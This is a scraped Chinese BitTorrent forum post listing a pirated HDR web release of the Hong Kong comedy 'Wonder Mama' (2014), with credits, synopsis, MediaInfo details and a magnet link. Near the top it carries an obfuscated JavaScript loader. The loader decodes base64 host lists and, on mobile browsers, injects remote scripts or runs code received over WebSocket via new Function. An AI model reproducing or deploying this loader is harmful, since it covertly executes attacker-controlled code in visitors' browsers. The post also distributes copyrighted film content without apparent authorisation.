妈咪侠[国语音轨].Wonder.Mama.2014.1080p.HDR.WEB-DL.H265.AAC 1.78GB

版主小s 1月前 206

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 妈咪侠 / This is 50 / Wonder Mama
◎片  名 媽咪俠
◎年  代 2014
◎产  地 中国香港 / 中国大陆
◎类  别 喜剧 / 家庭
◎语  言 汉语普通话 / 粤语
◎上映日期 2015-05-29(中国大陆) / 2014-11-06(中国台湾金马影展)
◎IMDb链接 https://www.imdb.com/title/tt3902214/
◎豆瓣评分 6.1/10 (1044人评价)
◎豆瓣链接 https://movie.douban.com/subject/25932073/
◎片  长 96分钟
◎导  演 高志森 Clifton Ko (id:1281025)
◎编  剧 高志森 Clifton Ko (id:1281025)
       钟燕诗 Harriet Chung Yin Sze (id:1349502)
◎演  员 冯宝宝 Bo-Bo Fung (id:1275994)
       曾江 Kenneth Tsang (id:1275451)
       邵音音 Yin-Yin Shaw (id:1297367)
       蔡瀚亿 Babyjohn Choi (id:1335563)
       王澜霏 Crystal Wang (id:1337572)
       温超 Chao Wen (id:1321630)
       谢君豪 Kwan-Ho Tse (id:1157914)
       白世鎏 Shiliu Bai (id:1349503)
       钟景辉 King-fai Chung (id:1313965)
       梁小冰 Siu-bing Leung (id:1016083)
       黄光亮 Kwong Leung Wong (id:1301194)
       马蹄露 Celine Ma Tai-Lau (id:1318726)
       谷德昭 Vincent Kok (id:1025526)
       田启文 Kai Man Tin (id:1315882)
       鲁芬 Fun Lo (id:1316723)
       高志森 Clifton Ko (id:1281025)
       余慕莲 Mo-Lin Yu (id:1345424)
       高志森 Clifton Ko (id:1281025)
       张颖 Ying Zhang (id:1425471)
       高志森 Clifton Ko (id:1281025)

◎标  签 香港 / 家庭 / 香港电影 / 喜剧 / 冯宝宝 / 2015 / 高志森 / 2014

◎简  介
  阿爱(冯宝宝 饰)人到五十,经历了诸多风风雨雨,回想起来自己的大半辈子似乎都依附在男人的身上,可是这些男人带给阿爱的却从来都只是失望。                                    
                                曾经,阿爱依赖父亲,可是父亲最终和母亲离婚,另觅新欢,还替阿爱造出了一个即将出世的弟弟,需要阿爱供养。之后,阿爱和丈夫结婚,本以为找到了稳固的依靠,没想到丈夫却无故失踪,掐指一算,已有十年之久。现在,阿爱将自己的全部希望寄托在了儿子(蔡瀚亿 饰)的身上,无奈儿子百无一用,是一个整天躲在卧室里和计算机形影不离的宅男。阿爱该如何在这接二连三的挫折和打击之中重新振作起来?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 273299622193629670616440604223667045280 (0xCD9B97B5C37DA0C7AD8BF9096A9603A0)

  4. Complete name                            : 妈咪侠[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 1.78 GiB

  8. Duration                                 : 1 h 35 min

  9. Overall bit rate                         : 2 651 kb/s

  10. Encoded date                             : UTC 2021-08-07 13:46:30

  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 35 min

  21. Bit rate                                 : 2 524 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 864 pixels

  24. Display aspect ratio                     : 2.222

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.063

  31. Stream size                              : 1.69 GiB (95%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : R: x=0.708000 y=0.292000, G: x=0.170000 y=0.797000, B: x=0.130000 y=0.046000, White point: x=0.312700 y=0.329000

  39. Mastering display luminance              : min: 0.0000 cd/m2, max: 0 cd/m2


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 1 h 35 min

  46. Bit rate                                 : 124 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 44.1 kHz

  50. Frame rate                               : 43.066 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 85.3 MiB (5%)

  53. Language                                 : Chinese

  54. Default                                  : Yes

  55. Forced                                   : No



TAGS 喜剧 家庭

磁力链:
  • magnet:?xt=urn:btih:BBAD5EA665392D75A01724ADF56FD8A8ACD5722F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回